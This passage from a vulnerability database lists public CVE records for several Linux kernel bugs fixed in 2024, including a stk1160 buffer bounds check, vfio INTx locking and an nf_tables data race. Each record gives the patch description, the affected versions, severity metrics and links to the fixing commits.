"url": "https://git.kernel.org/stable/c/9a3ca8292ce9fdcce122706c28c3f07bc857fe5e"
},
{
"url": "https://git.kernel.org/stable/c/d6b5aac451c9cc12e43ab7308e0e2ddc52c62c14"
},
{
"url": "https://git.kernel.org/stable/c/54d26adf64c04f186098b39dba86b86037084baa"
},
{
"url": "https://git.kernel.org/stable/c/f39d36b7540cf0088ed7ce2de2794f2aa237f6df"
},
{
"url": "https://git.kernel.org/stable/c/cd53a8ae5aacb4ecd25088486dea1cd02e74b506"
},
{
"url": "https://git.kernel.org/stable/c/fbec4e7fed89b579f2483041fabf9650fb0dd6bc"
}
],
"title": "soc: fsl: qbman: Use raw spinlock for cgr_lock",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35819",
"datePublished": "2024-05-17T13:23:23.031Z",
"dateReserved": "2024-05-17T12:19:12.343Z",
"dateUpdated": "2025-05-04T12:55:49.933Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38621 (GCVE-0-2024-38621)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
media: stk1160: fix bounds checking in stk1160_copy_video()
The subtract in this condition is reversed. The ->length is the length
of the buffer. The ->bytesused is how many bytes we have copied thus
far. When the condition is reversed that means the result of the
subtraction is always negative but since it's unsigned then the result
is a very high positive value. That means the overflow check is never
true.
Additionally, the ->bytesused doesn't actually work for this purpose
because we're not writing to "buf->mem + buf->bytesused". Instead, the
math to calculate the destination where we are writing is a bit
involved. You calculate the number of full lines already written,
multiply by two, skip a line if necessary so that we start on an odd
numbered line, and add the offset into the line.
To fix this buffer overflow, just take the actual destination where we
are writing, if the offset is already out of bounds print an error and
return. Otherwise, write up to buf->length bytes.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f Version: 9cb2173e6ea8f2948bd1367c93083a2500fcf08f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:49.029Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f6a392266276730bea893b55d12940e32a25f56a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ecf4ddc3aee8ade504c4d36b7b4053ce6093e200"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a16775828aaed1c54ff4e6fe83e8e4d5c6a50cb7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7532bcec0797adfa08791301c3bcae14141db3bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b504518a397059e1d55c521ba0ea2b545a6c4b52"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d410017a7181cb55e4a5c810b32b75e4416c6808"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a08492832cc4cacc24e0612f483c86ca899b9261"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/faa4364bef2ec0060de381ff028d1d836600a381"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38621",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T17:09:18.748299Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:45.084Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/stk1160/stk1160-video.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f6a392266276730bea893b55d12940e32a25f56a",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
},
{
"lessThan": "ecf4ddc3aee8ade504c4d36b7b4053ce6093e200",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
},
{
"lessThan": "a16775828aaed1c54ff4e6fe83e8e4d5c6a50cb7",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
},
{
"lessThan": "7532bcec0797adfa08791301c3bcae14141db3bd",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
},
{
"lessThan": "b504518a397059e1d55c521ba0ea2b545a6c4b52",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
},
{
"lessThan": "d410017a7181cb55e4a5c810b32b75e4416c6808",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
},
{
"lessThan": "a08492832cc4cacc24e0612f483c86ca899b9261",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
},
{
"lessThan": "faa4364bef2ec0060de381ff028d1d836600a381",
"status": "affected",
"version": "9cb2173e6ea8f2948bd1367c93083a2500fcf08f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/media/usb/stk1160/stk1160-video.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: stk1160: fix bounds checking in stk1160_copy_video()\n\nThe subtract in this condition is reversed. The -\u003elength is the length\nof the buffer. The -\u003ebytesused is how many bytes we have copied thus\nfar. When the condition is reversed that means the result of the\nsubtraction is always negative but since it\u0027s unsigned then the result\nis a very high positive value. That means the overflow check is never\ntrue.\n\nAdditionally, the -\u003ebytesused doesn\u0027t actually work for this purpose\nbecause we\u0027re not writing to \"buf-\u003emem + buf-\u003ebytesused\". Instead, the\nmath to calculate the destination where we are writing is a bit\ninvolved. You calculate the number of full lines already written,\nmultiply by two, skip a line if necessary so that we start on an odd\nnumbered line, and add the offset into the line.\n\nTo fix this buffer overflow, just take the actual destination where we\nare writing, if the offset is already out of bounds print an error and\nreturn. Otherwise, write up to buf-\u003elength bytes."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:15:28.927Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f6a392266276730bea893b55d12940e32a25f56a"
},
{
"url": "https://git.kernel.org/stable/c/ecf4ddc3aee8ade504c4d36b7b4053ce6093e200"
},
{
"url": "https://git.kernel.org/stable/c/a16775828aaed1c54ff4e6fe83e8e4d5c6a50cb7"
},
{
"url": "https://git.kernel.org/stable/c/7532bcec0797adfa08791301c3bcae14141db3bd"
},
{
"url": "https://git.kernel.org/stable/c/b504518a397059e1d55c521ba0ea2b545a6c4b52"
},
{
"url": "https://git.kernel.org/stable/c/d410017a7181cb55e4a5c810b32b75e4416c6808"
},
{
"url": "https://git.kernel.org/stable/c/a08492832cc4cacc24e0612f483c86ca899b9261"
},
{
"url": "https://git.kernel.org/stable/c/faa4364bef2ec0060de381ff028d1d836600a381"
}
],
"title": "media: stk1160: fix bounds checking in stk1160_copy_video()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38621",
"datePublished": "2024-06-21T10:18:14.955Z",
"dateReserved": "2024-06-18T19:36:34.945Z",
"dateUpdated": "2025-11-04T17:21:49.029Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26810 (GCVE-0-2024-26810)
Vulnerability from cvelistv5
Published
2024-04-05 08:24
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vfio/pci: Lock external INTx masking ops
Mask operations through config space changes to DisINTx may race INTx
configuration changes via ioctl. Create wrappers that add locking for
paths outside of the core interrupt code.
In particular, irq_type is updated holding igate, therefore testing
is_intx() requires holding igate. For example clearing DisINTx from
config space can otherwise race changes of the interrupt configuration.
This aligns interfaces which may trigger the INTx eventfd into two
camps, one side serialized by igate and the other only enabled while
INTx is configured. A subsequent patch introduces synchronization for
the latter flows.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 Version: 89e1f7d4c66d85f42c3d52ea3866eb10cadf6153 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26810",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-05T17:23:22.081964Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T20:03:53.512Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.648Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1e71b6449d55179170efc8dee8664510bb813b42"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3dd9be6cb55e0f47544e7cdda486413f7134e3b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec73e079729258a05452356cf6d098bf1504d5a6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3fe0ac10bd117df847c93408a9d428a453cd60e5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04a4a017b9ffd7b0f427b8c376688d14cb614651"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6fe478d855b20ac1eb5da724afe16af5a2aaaa40"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/03505e3344b0576fd619416793a31eae9c5b73bf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/810cd4bb53456d0503cc4e7934e063835152c1b7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1e71b6449d55179170efc8dee8664510bb813b42",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "3dd9be6cb55e0f47544e7cdda486413f7134e3b3",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "ec73e079729258a05452356cf6d098bf1504d5a6",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "3fe0ac10bd117df847c93408a9d428a453cd60e5",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "04a4a017b9ffd7b0f427b8c376688d14cb614651",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "6fe478d855b20ac1eb5da724afe16af5a2aaaa40",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "03505e3344b0576fd619416793a31eae9c5b73bf",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
},
{
"lessThan": "810cd4bb53456d0503cc4e7934e063835152c1b7",
"status": "affected",
"version": "89e1f7d4c66d85f42c3d52ea3866eb10cadf6153",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vfio/pci/vfio_pci_intrs.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.6"
},
{
"lessThan": "3.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "3.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/pci: Lock external INTx masking ops\n\nMask operations through config space changes to DisINTx may race INTx\nconfiguration changes via ioctl. Create wrappers that add locking for\npaths outside of the core interrupt code.\n\nIn particular, irq_type is updated holding igate, therefore testing\nis_intx() requires holding igate. For example clearing DisINTx from\nconfig space can otherwise race changes of the interrupt configuration.\n\nThis aligns interfaces which may trigger the INTx eventfd into two\ncamps, one side serialized by igate and the other only enabled while\nINTx is configured. A subsequent patch introduces synchronization for\nthe latter flows."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:05.248Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/1e71b6449d55179170efc8dee8664510bb813b42"
},
{
"url": "https://git.kernel.org/stable/c/3dd9be6cb55e0f47544e7cdda486413f7134e3b3"
},
{
"url": "https://git.kernel.org/stable/c/ec73e079729258a05452356cf6d098bf1504d5a6"
},
{
"url": "https://git.kernel.org/stable/c/3fe0ac10bd117df847c93408a9d428a453cd60e5"
},
{
"url": "https://git.kernel.org/stable/c/04a4a017b9ffd7b0f427b8c376688d14cb614651"
},
{
"url": "https://git.kernel.org/stable/c/6fe478d855b20ac1eb5da724afe16af5a2aaaa40"
},
{
"url": "https://git.kernel.org/stable/c/03505e3344b0576fd619416793a31eae9c5b73bf"
},
{
"url": "https://git.kernel.org/stable/c/810cd4bb53456d0503cc4e7934e063835152c1b7"
}
],
"title": "vfio/pci: Lock external INTx masking ops",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26810",
"datePublished": "2024-04-05T08:24:41.987Z",
"dateReserved": "2024-02-19T14:20:24.179Z",
"dateUpdated": "2025-05-04T08:57:05.248Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27020 (GCVE-0-2024-27020)
Vulnerability from cvelistv5
Published
2024-05-01 05:30
Modified
2025-11-04 17:17
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: Fix potential data-race in __nft_expr_type_get()
nft_unregister_expr() can concurrent with __nft_expr_type_get(),
and there is not any protection when iterate over nf_tables_expressions
list in __nft_expr_type_get(). Therefore, there is potential data-race
of nf_tables_expressions list entry.
Use list_for_each_entry_rcu() to iterate over nf_tables_expressions
list in __nft_expr_type_get(), and use rcu_read_lock() in the caller
nft_expr_type_get() to protect the entire type query process.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e Version: ef1f7df9170dbd875ce198ba84e6ab80f6fc139e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-27020",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-30T19:26:58.391230Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-362",
"description": "CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-30T19:27:09.041Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:17:36.550Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/939109c0a8e2a006a6cc8209e262d25065f4403a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b38a133d37fa421c8447b383d788c9cc6f5cb34c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/934e66e231cff2b18faa2c8aad0b8cec13957e05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b6de00206adbbfc6373b3ae38d2a6f197987907"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8d56bad42ac4c43c6c72ddd6a654a2628bf839c5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9ebf340d123ae12582210407f879d6a5a1bc25b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/01f1a678b05ade4b1248019c2dcca773aebbeb7f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f969eb84ce482331a991079ab7a5c4dc3b7f89bf"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "939109c0a8e2a006a6cc8209e262d25065f4403a",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
},
{
"lessThan": "b38a133d37fa421c8447b383d788c9cc6f5cb34c",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
},
{
"lessThan": "934e66e231cff2b18faa2c8aad0b8cec13957e05",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
},
{
"lessThan": "0b6de00206adbbfc6373b3ae38d2a6f197987907",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
},
{
"lessThan": "8d56bad42ac4c43c6c72ddd6a654a2628bf839c5",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
},
{
"lessThan": "a9ebf340d123ae12582210407f879d6a5a1bc25b",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
},
{
"lessThan": "01f1a678b05ade4b1248019c2dcca773aebbeb7f",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
},
{
"lessThan": "f969eb84ce482331a991079ab7a5c4dc3b7f89bf",
"status": "affected",
"version": "ef1f7df9170dbd875ce198ba84e6ab80f6fc139e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.13"
},
{
"lessThan": "3.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
